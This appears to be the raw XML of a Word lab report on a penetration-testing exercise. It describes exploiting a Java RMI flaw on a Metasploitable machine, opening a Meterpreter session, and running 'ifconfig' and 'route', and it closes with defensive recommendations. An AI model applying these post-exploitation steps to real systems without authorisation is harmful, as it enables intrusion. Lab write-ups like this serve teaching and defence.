    <w:p w14:paraId="200B0C82" w14:textId="77777777" w:rsidR="0069443B" w:rsidRDefault="0069443B"/>
    <w:p w14:paraId="62EBA321" w14:textId="3A1EEDDA" w:rsidR="0069443B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="005937FA" w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005937FA" w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15F61291" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:t>Launched</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:t xml:space="preserve"> exploit with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637828C4" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:r w:rsidRPr="005937FA">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C0D55A" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Successfully established Meterpreter session on victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7176862D" w14:textId="77777777" w:rsidR="0069443B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16221B1F" wp14:editId="357741F7">
            <wp:extent cx="5731510" cy="1184275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Immagine5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5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2A9B" w14:textId="77777777" w:rsidR="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63021EC2" w14:textId="77777777" w:rsidR="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65612E99" w14:textId="77777777" w:rsidR="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D699D75" w14:textId="6362EE69" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Information </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gathering</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C51EA24" w14:textId="28694C7D" w:rsidR="005937FA" w:rsidRDefault="005937FA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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1024115F" w14:textId="7970C4AA" w:rsidR="0069443B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="005937FA" w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005937FA" w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005937FA" w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> session, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005937FA" w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>ran</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005937FA" w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA7599" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7EB6797F" w14:textId="77777777" w:rsidR="005937FA" w:rsidRDefault="005937FA"/>
    <w:p w14:paraId="52BB1665" w14:textId="77777777" w:rsidR="0069443B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B2A6212" wp14:editId="64010F00">
            <wp:extent cx="4000500" cy="2796540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Immagine6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6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0CB8A40" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Obtained details about </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Metasploitable's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> network interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E56F2F6" w14:textId="2DFE6BE9" w:rsidR="0069443B" w:rsidRDefault="0069443B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B3B225" w14:textId="0187849D" w:rsidR="0069443B" w:rsidRPr="005937FA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="005937FA" w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Routing Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C5E2C6" w14:textId="3E2700D8" w:rsidR="0069443B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="005937FA" w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>In same session, executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F280FA" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:t>route</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C435D95" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02999BA7" w14:textId="77777777" w:rsidR="0069443B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17A95143" wp14:editId="559F3E25">
            <wp:extent cx="5426075" cy="2078990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Immagine7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7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3C0B" w14:textId="5C161717" w:rsidR="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Viewed routing table showing packet routing paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2333086E" w14:textId="77777777" w:rsidR="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117737B1" w14:textId="0E298F28" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Conclusion and Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C27A3C" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">After gaining access to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine and collecting network/routing information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D807C5" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Analyzed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> data to understand potential vulnerabilities and network topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AEDE59" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>This information can be used for further security analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C949E47" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Recommended implementing preventive measures against similar attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C88C822" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Update Java RMI services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0672B5FE" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Implement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> network </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>segmentation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79BC8B7D" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Monitor RMI service ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51403FC8" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Apply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> security patches </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>regularly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28DBC1C9" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The exercise successfully demonstrated exploitation of Java RMI vulnerability and post-exploitation information gathering techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C3487" w14:textId="77777777" w:rsidR="0069443B" w:rsidRPr="005937FA" w:rsidRDefault="0069443B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0069443B" w:rsidRPr="005937F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325"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="180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6DDB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="619C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40E9F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="247A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A5E37"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80FC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436604"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB0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5353E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96FA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62BC2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEBE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B1E8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC16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F2946"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B9C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987103">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1053891926">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1447574879">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1291015341">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="150679980">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1029718040">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="921837975">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1483353191">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="20617121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3B"/>
    <w:rsid w:val="0038572B"/>
    <w:rsid w:val="005937FA"/>
    <w:rsid w:val="0069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2DFF"/>
  <w15:docId w15:val="{79E449EB-AF30-438A-AD26-B4BC3A4D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32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32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32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32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32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32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32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32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232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232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232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232D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232D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232D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232D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232D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232D59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232D5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232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232D59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32D59"/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232D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32D59"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5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232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32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32D59"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr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32D59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32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Enfasigrassetto">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00593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3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548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38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92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6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5321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9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62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02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9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9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8802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0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7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1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60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1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6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06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22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44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5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0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087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55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7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6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81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06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0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627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89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1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5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5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2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25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345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94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287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21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0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518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32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1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5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58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75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dc:description/>
  <cp:lastModifiedBy>Michele Covi</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-22T07:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-07T08:18:00Z</dcterms:modified>
  <dc:language>it-IT</dc:language>
</cp:coreProperties>
</file>